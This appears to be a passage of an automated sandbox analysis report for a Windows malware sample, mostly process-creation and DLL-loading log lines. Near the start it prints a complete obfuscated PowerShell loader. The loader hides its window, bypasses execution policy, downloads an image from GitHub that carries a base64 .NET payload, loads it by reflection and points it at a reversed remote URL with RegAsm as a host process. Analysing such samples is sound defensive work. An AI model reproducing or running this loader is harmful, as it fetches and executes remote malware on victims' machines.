Rlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
